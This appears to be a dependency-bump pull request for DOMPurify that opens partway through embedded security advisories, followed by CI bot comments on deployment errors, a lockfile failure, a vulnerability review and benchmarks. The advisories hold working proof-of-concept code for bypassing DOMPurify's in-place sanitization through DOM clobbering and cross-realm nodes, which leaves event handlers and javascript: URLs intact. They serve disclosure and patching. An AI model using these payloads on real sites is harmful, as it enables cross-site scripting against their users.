const nodeIterator = _createNodeIterator(IN_PLACE ? dirty : body);

while ((currentNode = nodeIterator.nextNode())) {
  _sanitizeElements(currentNode);       // returns `true` if killed — IGNORED
  _sanitizeAttributes(currentNode);     // runs unconditionally; relies on [B]'s skip
  ...
}

If the return value were checked and _sanitizeAttributes skipped when the node was "killed," the bug would not exist as a discrete issue — but currently _sanitizeAttributes is the only line of defense for a node that _sanitizeElements could not actually detach.

Why the clobber works

In Chromium/WebKit/Firefox, HTMLFormElement carries the WebIDL [LegacyOverrideBuiltIns] extended attribute on its named-property getter. A descendant element with name="X" (or id="X", for radio-button-like names) shadows the matching property on the form, including properties inherited from Element, Node, and EventTarget prototypes. This is the same primitive the just-landed 89da34e fix addresses for shadow-root traversal, but _isClobbered's typeof checks (and the bypass-by-detection-failure path here) are independent of that fix.

Verified clobber targets (each name= value independently triggers _isClobbered):

name= value	property _isClobbered checks	typeof on clobbered form
nodeName	typeof element.nodeName !== 'string'	object (an <INPUT>)
setAttribute	typeof element.setAttribute !== 'function'	object (not callable) — but <embed>/<applet>/<iframe> ARE callable; see "Note on callable elements" below
namespaceURI	typeof element.namespaceURI !== 'string'	object
insertBefore	typeof element.insertBefore !== 'function'	object
hasChildNodes	typeof element.hasChildNodes !== 'function'	object
childNodes	!(element.childNodes && typeof element.childNodes.length === 'number')	object — <INPUT> has no .length
attributes	!(element.attributes instanceof NamedNodeMap)	object (an <INPUT> is not a NamedNodeMap)
textContent	typeof element.textContent !== 'string'	object
removeChild	typeof element.removeChild !== 'function'	object (non-callable)
removeAttribute	typeof element.removeAttribute !== 'function'	object (non-callable)

Any single one of the ten property names in _isClobbered's checklist is sufficient as the bypass trigger.

Proof of concept

(1) Minimal — runnable in a single browser context

<!doctype html>
<html><body>
<script src="dist/purify.js"></script>
<script>
  const root = document.createElement('form');
  root.setAttribute('onmouseover', 'window.__rooted = 1');
  const clobber = document.createElement('input');
  clobber.setAttribute('name', 'nodeName');
  root.appendChild(clobber);

  // typeof root.nodeName === 'object' (an <INPUT> element), not 'string'.
  // _isClobbered fires; _forceRemove(root) becomes a no-op because root.parentNode === null.
  DOMPurify.sanitize(root, { IN_PLACE: true });

  console.log('output:', root.outerHTML);
  // <form onmouseover="window.__rooted = 1"><input name="nodeName"></form>
  //  ^^^^^^^^^^^^^^^^^^ event handler survived ^^^^^^^^^^^^^^^^^^

  document.body.appendChild(root);
  root.dispatchEvent(new MouseEvent('mouseover', { bubbles: true }));
  console.log('handler fired:', window.__rooted === 1);  // true
</script>
</body></html>

(2) End-to-end — Playwright against main HEAD

const { chromium } = require('playwright');
const path = require('path');

(async () => {
  const browser = await chromium.launch();
  const page = await browser.newPage();
  await page.setContent('<!doctype html><html><body></body></html>');
  await page.addScriptTag({ path: path.resolve('dist/purify.js') });

  const result = await page.evaluate(() => {
    const root = document.createElement('form');
    root.setAttribute('onmouseover', 'window.__rooted = 1');
    const clobber = document.createElement('input');
    clobber.setAttribute('name', 'nodeName');
    root.appendChild(clobber);

    DOMPurify.sanitize(root, { IN_PLACE: true });

    document.body.appendChild(root);
    window.__rooted = 0;
    root.dispatchEvent(new MouseEvent('mouseover', { bubbles: true }));

    return {
      version: DOMPurify.version,
      output: root.outerHTML,
      handlerFired: window.__rooted === 1,
    };
  });
  console.log(result);
  await browser.close();
})();

Observed (Chromium 148.0.7778.96, DOMPurify 3.4.5, HEAD 89da34e):

{
  version: '3.4.5',
  output: '<form onmouseover="window.__rooted = 1"><input name="nodeName"></form>',
  handlerFired: true
}

(3) Variant matrix — six distinct clobber-target properties

Every property name in _isClobbered's typeof checklist works as the bypass trigger:

[BYPASS] name="nodeName"      → <form onmouseover="…"><input></form>
[BYPASS] name="setAttribute"  → <form onmouseover="…"><input></form>
[BYPASS] name="namespaceURI"  → <form onmouseover="…"><input></form>
[BYPASS] name="insertBefore"  → <form onmouseover="…"><input></form>
[BYPASS] name="hasChildNodes" → <form onmouseover="…"><input></form>
[BYPASS] name="childNodes"    → <form onmouseover="…"><input></form>

This makes the fix less of a one-line patch — every property _isClobbered checks for the typeof-spoofing pattern needs to be considered.

Impact

Direct

Two distinct impact paths from the same root-attribute-survival primitive:

(a) XSS via event-handler attribute on the surviving root. Any consumer that uses DOMPurify.sanitize(node, { IN_PLACE: true }) where node originated from untrusted HTML and is re-inserted into the live document is vulnerable to XSS. The typical pattern is:

const t = document.createElement('template');
t.innerHTML = untrustedHtml;
DOMPurify.sanitize(t.content.firstElementChild, { IN_PLACE: true });
container.appendChild(t.content.firstElementChild);

If untrustedHtml is <form onmouseover=…><input name=nodeName>…</form>, the resulting node has the onmouseover attribute intact when re-inserted into the live document.

(b) Every attribute-level defense is bypassed on the surviving root, not just event handlers. The _sanitizeAttributes early-return at :1490 skips the entire attribute walk for clobbered nodes, so the root preserves attributes that the attribute walk would otherwise sanitize. Verified additional attributes that survive:

• action="javascript:..." and formaction="javascript:..." — URI validation at :1413 never runs. A user click on a submit button inside the sanitized form navigates to the javascript: URL, executing the handler. Adds a click-triggered XSS path on top of the mouseover/focus event-handler attributes already documented.
• id="<colliding-name>" — the DOM-clobbering guard at :1352-1359 (SANITIZE_DOM && (lcName === 'id' || lcName === 'name') && (value in document || value in formElement)) lives inside _sanitizeAttributes and is skipped. An attacker can therefore land id="cookie", id="body", id="head", id="firstChild", etc. on the surviving form root and use it as a DOM-clobbering primitive against any consumer code that does document.cookie, document.body, etc.
• target="_top", autofocus, formenctype, formmethod — all survive untouched.
• Custom event handlers DOMPurify wouldn't have explicit list entries for (e.g., newly-spec'd oncontentvisibilityautostatechange) survive on the clobbered root via the same skip; the per-name allow-list at :1361-1364 never runs.

Verified — full attribute set survives on a single payload (PoC):

const root = document.createElement('form');
root.setAttribute('action', 'javascript:alert(1)');
root.setAttribute('target', '_top');
root.setAttribute('onclick', 'alert(2)');
root.setAttribute('onmouseover', 'alert(3)');
root.setAttribute('autofocus', '');
root.setAttribute('formaction', 'javascript:alert(4)');
root.setAttribute('id', 'cookie');           // DOM-clobbering primitive
root.innerHTML += '<input name="nodeName">';
DOMPurify.sanitize(root, { IN_PLACE: true });
console.log(root.outerHTML);
// <form action="javascript:alert(1)" target="_top" onclick="alert(2)"
//       onmouseover="alert(3)" autofocus="" formaction="javascript:alert(4)"
//       id="cookie"><input></form>

(c) Defense-in-depth re-sanitization on the same node is INEFFECTIVE — the clobber is sticky. Chromium's HTMLFormElement named-property cache appears to retain the named child reference even after the child's name attribute is removed during the sanitization pass. Empirically verified — after the first sanitize pass, the input's name="nodeName" attribute is correctly stripped (the output shows <input> with no attributes), yet typeof form.nodeName === 'object' is still true and the input element is still returned. Calling DOMPurify.sanitize(sameNode, { IN_PLACE: true }) a second time hits the same _isClobbered → _forceRemove → _sanitizeAttributes early-return path. The only effective recovery is serialize-then-reparse:

const root = parseAttackerHtml();                                     // form with input name="nodeName" child
DOMPurify.sanitize(root, { IN_PLACE: true });                         // bypass: attrs survive
DOMPurify.sanitize(root, { IN_PLACE: true });                         // STILL bypassed: attrs survive
const recovered = (() => {
  const t = document.createElement('template');
  t.innerHTML = root.outerHTML;                                       // forces a fresh parse
  const r = t.content.firstElementChild;
  DOMPurify.sanitize(r, { IN_PLACE: true });
  return r;
})();
// recovered.outerHTML === '<form><input></form>'  ← finally clean

A "belt-and-suspenders" caller that re-runs DOMPurify on its own output is therefore not protected against this primitive on Chromium; the obvious mitigation pattern fails silently. Any user-side workaround needs to route through a string round-trip.

(d) SAFE_FOR_TEMPLATES bypass for the root's attributes. When the caller sets SAFE_FOR_TEMPLATES: true to defend a downstream template engine (Vue, Angular, Liquid, Handlebars, …) from receiving `` / <%…%> / `${…}` syntax through DOMPurify's output, attribute-level template-syntax stripping runs in the same `_sanitizeAttributes` pass that early-returns on clobbered roots (`:1572-1576`). The root's attributes therefore retain raw template syntax that the downstream engine then evaluates.

Verified — same PoC structure, with SAFE_FOR_TEMPLATES: true:

const root = document.createElement('form');
root.setAttribute('title', '');
root.setAttribute('onmouseover', 'window.__x=1');
const c = document.createElement('input');
c.setAttribute('name', 'nodeName');
root.appendChild(c);

DOMPurify.sanitize(root, { IN_PLACE: true, SAFE_FOR_TEMPLATES: true });

console.log(root.outerHTML);
// <form title="" onmouseover="window.__x=1"><input></form>
//        ^^^^^^^^^^^^^^^^ template syntax survives

This compounds with (a): a single payload exfiltrates via XSS (immediate) and via SSTI to downstream renderers (delayed).

(Text-node content inside the form is still scrubbed correctly — _scrubTemplateExpressions at :1868-1870 walks text/comment/CDATA/PI nodes independently and reaches them via the iterator. Only attribute values on the clobbered root escape.)

Indirect / second-order

• DOM-based template systems / editors that wrap DOMPurify with an IN_PLACE call for parsed user content (CMSes, comment widgets, WYSIWYG editors persisting structured HTML).
• Email/HTML preview libraries that pre-parse received HTML before sanitization for performance reasons.
• Frameworks that hand DOMPurify a node tree rather than a string — including, indirectly, any code path that does el.innerHTML = …; DOMPurify.sanitize(el, { IN_PLACE: true }). The outer el is fine (it's not the form), but if the first child of el is taken as the sanitization root in a different code path, the bypass triggers.

Why current main is also vulnerable

Commit 89da34e ("fix: fixed a possible DOM clobbering with IN_PLACE and shadow DOM") hardens _sanitizeAttachedShadowRoots via three new cached prototype getters (getShadowRoot, getNodeName, getNodeType) and an _isClobbered extension that checks element.childNodes.length. The fix is correct for its scope — shadow-root traversal — but does not change _forceRemove's parent-less-node behavior or _sanitizeAttributes's clobber-skip early-return. The bypass demonstrated here is in the IN_PLACE main pipeline, not the shadow-root walk, and the verification PoC above runs against HEAD 89da34e and still succeeds.

Suggested fix

Two minimal-risk options:

1. Make _forceRemove honest about failure: return whether the node was actually detached, and have the iterator call site honor that.

   const _forceRemove = function (node: Node): boolean {
     arrayPush(DOMPurify.removed, { element: node });
     try {
       getParentNode(node).removeChild(node);
       return true;
     } catch (_) {
       try { remove(node); } catch (_) {}
       return node.parentNode === null && /* but still attached to itself */ false;
     }
   };

   Then at :1855, if _sanitizeElements returns true AND IN_PLACE, force-strip all attributes of the root before returning the dirty tree. (This is what the user expects — sanitization either succeeds or refuses to return a "sanitized" handle to an unsanitized tree.)

2. Strip attributes inside _sanitizeAttributes for clobbered roots: when _isClobbered(currentNode) is true at :1490, instead of early-returning, iterate currentNode.attributes (using the cached getAttributes if you add one) and remove each via removeAttribute. This preserves the existing semantics for non-root clobbered nodes (their attributes-of-a-removed-node will be GC'd anyway) and removes the attack surface for root.

3. Refuse IN_PLACE on parent-less clobbered roots: at the top of the iterator, check that the root either has a parent OR is not _isClobbered. If both fail, throw. This is the most defensive option but breaks any existing caller that hands in a clobbered detached root expecting "sanitized = empty/safe."

Note on callable elements

In Chromium and WebKit, HTMLEmbedElement, HTMLAppletElement, HTMLIFrameElement, and HTMLScriptElement have typeof === 'function' because they expose plugin/iframe [[Call]] traps at the WebIDL level. A name="setAttribute" child of one of these tags spoofs the setAttribute typeof === 'function' check — but only matters for the attribute re-set path at :1619, not the bypass demonstrated here (which uses nodeName and friends). The callable-element vector is worth checking separately as a potential SAFE_FOR_TEMPLATES-bypass primitive; the present report does not depend on it.

CVE-2026-49458

Cross-realm IN_PLACE sanitization leaves executable markup intact via realm-bound instanceof checks

CWE: CWE-79 (XSS — Improper Neutralization of Input During Web Page Generation) via CWE-693 (Protection Mechanism Failure — realm-bound instanceof checks fail-open on foreign-realm DOM nodes) and CWE-501 (Trust Boundary Violation — foreign-realm nodes accepted for sanitization but later checks are bound to the parent realm)

Summary

DOMPurify.sanitize(node, { IN_PLACE: true }) accepts a DOM node from any same-origin realm (e.g. a node owned by an application-created iframe document), but several follow-on security checks compare the node against constructors from the parent realm. Because constructors are per-realm, instanceof HTMLFormElement, instanceof NamedNodeMap, instanceof DocumentFragment, and instanceof Element all return false for nodes belonging to the iframe's realm. The library therefore proceeds as if the foreign-realm form is not clobberable, the foreign-realm <template>'s .content is not a document fragment, and the foreign-realm attached shadow root is not a document fragment — silently skipping the clobber/template-content/shadow-DOM sanitization branches that those checks gate. Attacker-controlled markup survives in form attributes, template content, and attached shadow roots, and executes when the application later inserts or activates the sanitized node.

Affected

• DOMPurify ≤ 3.4.5, including main at 89da34e03ec17868e561f87f3747a9371b61a9e7
• Any caller that constructs or parses untrusted DOM in a same-origin iframe (or any other same-origin realm — popup window, opened tab, programmatically-created <iframe srcdoc>) and then calls DOMPurify.sanitize(foreignNode, { IN_PLACE: true }) against a sanitizer instance bound to a different realm

Not affected:

• String-input DOMPurify.sanitize(dirtyString) — the library calls its own parser inside _initDocument, the resulting nodes belong to the sanitizer's own realm, and the instanceof checks resolve as expected
• IN_PLACE calls where the input node was created in the same realm as the DOMPurify instance

Vulnerability details

The unifying defect is that _isClobbered, _sanitizeShadowDOM's template-content recursion, and _sanitizeAttachedShadowRoots all use realm-bound instanceof checks against the parent-realm constructors. Each branch fails-open for foreign-realm objects.

[A] — _isClobbered gates on element instanceof HTMLFormElement

src/purify.ts:1120-1140:

const _isClobbered = function (element: Element): boolean {
  return (
    element instanceof HTMLFormElement &&    // [A] realm-bound — false for any
                                              //     iframe-realm <form> element
    (typeof element.nodeName !== 'string' ||
      typeof element.textContent !== 'string' ||
      typeof element.removeChild !== 'function' ||
      !(element.attributes instanceof NamedNodeMap) ||   // [A'] also realm-bound
      typeof element.removeAttribute !== 'function' ||
      typeof element.setAttribute !== 'function' ||
      typeof element.namespaceURI !== 'string' ||
      typeof element.insertBefore !== 'function' ||
      typeof element.hasChildNodes !== 'function' ||
      !(element.childNodes && typeof element.childNodes.length === 'number'))
  );
};

A foreign-realm <form> is an instance of the foreign realm's HTMLFormElement, not the parent realm's. The leading instanceof short-circuits to false, so _isClobbered returns false regardless of the named-property clobbering present on the form. The follow-on _sanitizeAttributes then iterates currentNode.attributes — which itself can be a clobbered value (a foreign-realm <input> whose name="attributes" shadows the form's real NamedNodeMap). The attribute walk traverses the wrong collection and never reaches the actual onmouseover / onclick / action=javascript: attributes on the form root.

[B] — _sanitizeShadowDOM gates template recursion on content instanceof DocumentFragment

src/purify.ts:1660-1662:

while ((shadowNode = shadowIterator.nextNode())) {
  ...
  _sanitizeElements(shadowNode);
  _sanitizeAttributes(shadowNode);
  /* Deep shadow DOM detected */
  if (shadowNode.content instanceof DocumentFragment) {   // [B] realm-bound
    _sanitizeShadowDOM(shadowNode.content);
  }
}

The same check exists in the main iterator at :1861-1862:

if (currentNode.content instanceof DocumentFragment) {     // [B'] realm-bound
  _sanitizeShadowDOM(currentNode.content);
}

For a <template> element constructed in a foreign realm, template.content is a DocumentFragment from that realm — not from the parent realm. Both checks miss it, and the template's contents (which carry attacker-controlled <img src=x onerror=...> etc.) are never walked. The sanitized output appears clean from the outside, but the moment a consumer does node.cloneNode(true) / importNode(template.content, true) / inserts it into the live DOM, the embedded handler fires.

[C] — _sanitizeAttachedShadowRoots gates recursion on sr instanceof DocumentFragment

src/purify.ts:1702-1712:

if (nodeType === NODE_TYPE.element) {
  const sr = getShadowRoot
    ? getShadowRoot(root)
    : (root as Element).shadowRoot;
  if (sr instanceof DocumentFragment) {                    // [C] realm-bound
    _sanitizeAttachedShadowRoots(sr);
    _sanitizeShadowDOM(sr);
  }
}

For a host element constructed in a foreign realm with host.attachShadow({mode:'open'}), host.shadowRoot is a foreign-realm ShadowRoot (which extends the foreign real

[vercel]

The latest updates on your projects. Learn more about Vercel for GitHub.

Project	Deployment	Actions	Updated (UTC)
hash	Error		Jun 17, 2026 5:15pm
hashdotdesign-tokens	Error		Jun 17, 2026 5:15pm
petrinaut	Error	Comment	Jun 17, 2026 5:15pm

[hash-worker]

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

• any of the package files in this branch needs updating, or
• the branch becomes conflicted, or
• you click the rebase/retry checkbox if found above, or
• you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: yarn.lock

error This project's package.json defines "packageManager": "yarn@4.16.0". However the current global version of Yarn is 1.22.22.

Presence of the "packageManager" field indicates that the project is meant to be used with Corepack, a tool included by default with all official Node.js distributions starting from 16.9 and 14.19.
Corepack must currently be enabled by running corepack enable in your terminal. For more information, check out https://yarnpkg.com/corepack.

[cursor]

PR Summary

Low Risk
Patch-only semver bump with no source changes; existing usage is string sanitization, though the library is security-sensitive in general.

Overview
Bumps dompurify from 3.4.0 to 3.4.9 in @apps/hash-frontend and pins the same version in the root Yarn resolutions so the whole monorepo resolves consistently.

This is a dependency-only change (no application code). The upgrade addresses GHSA-gvmj-g25r-r7wr (template-expression bypass when SAFE_FOR_TEMPLATES is used with DOM return modes). Frontend call sites use the default string DOMPurify.sanitize() path with tight ALLOWED_TAGS, not those options.

^{Reviewed by Cursor Bugbot for commit b40d41f. Bugbot is set up for automated code reviews on this repo. Configure here.}

[github-actions]

Dependency Review

The following issues were found:

• ❌ 1 vulnerable package(s)
• ✅ 0 package(s) with incompatible licenses
• ✅ 0 package(s) with invalid SPDX license definitions
• ✅ 0 package(s) with unknown licenses.

See the Details below.

Vulnerabilities

apps/hash-frontend/package.json

Name	Version	Vulnerability	Severity	Patched Version
dompurify	3.4.8	DOMPurify: Trusted Types policy survives `clearConfig()` and can poison later `RETURN_TRUSTED_TYPE` output	low	3.4.9

OpenSSF Scorecard

Package	Version	Score	Details
npm/dompurify	3.4.8	🟢 9.8	Details Check Score Reason Maintained 🟢 10 30 commit(s) and 17 issue activity found in the last 90 days -- score normalized to 10 Dangerous-Workflow 🟢 10 no dangerous workflow patterns detected Dependency-Update-Tool 🟢 10 update tool detected Packaging ⚠️ -1 packaging workflow not detected Binary-Artifacts 🟢 10 no binaries found in the repo Security-Policy 🟢 10 security policy file detected Code-Review 🟢 10 all changesets reviewed Pinned-Dependencies 🟢 10 all dependencies are pinned Token-Permissions 🟢 10 GitHub workflow tokens follow principle of least privilege CII-Best-Practices 🟢 7 badge detected: Silver Signed-Releases 🟢 10 5 out of the last 5 releases have a total of 10 signed artifacts. License 🟢 10 license file detected SAST 🟢 10 SAST tool is run on all commits Vulnerabilities 🟢 10 0 existing vulnerabilities detected Fuzzing 🟢 10 project is fuzzed Branch-Protection 🟢 8 branch protection is not maximal on development and all release branches CI-Tests 🟢 10 30 out of 30 merged PRs checked by a CI test -- score normalized to 10 Contributors 🟢 10 project has 40 contributing companies or organizations

Scanned Files

• apps/hash-frontend/package.json

[codspeed-hq]

Merging this PR will degrade performance by 15.38%

⚠️ Different runtime environments detected

Some benchmarks with significant performance changes were compared across different runtime environments,
which may affect the accuracy of the results.

Open the report in CodSpeed to investigate

❌ 2 regressed benchmarks
✅ 78 untouched benchmarks

Warning

Please fix the performance issues or acknowledge them on CodSpeed.

Performance Changes

	Benchmark	BASE	HEAD	Efficiency
❌	bit_matrix/dense/iter_row[64]	140.8 ns	170 ns	-17.16%
❌	bit_matrix/dense/iter_row[200]	185.8 ns	215 ns	-13.57%

Tip

Investigate this regression by commenting @codspeedbot fix this regression on this PR, or directly use the CodSpeed MCP with your agent.

---

_{Comparing deps/js/npm-dompurify-vulnerability (b40d41f) with main (f416092)¹}

Footnotes

1. No successful run was found on main (1f55b56) during the generation of this report, so f416092 was used instead as the comparison base. There might be some changes unrelated to this pull request in this report. ↩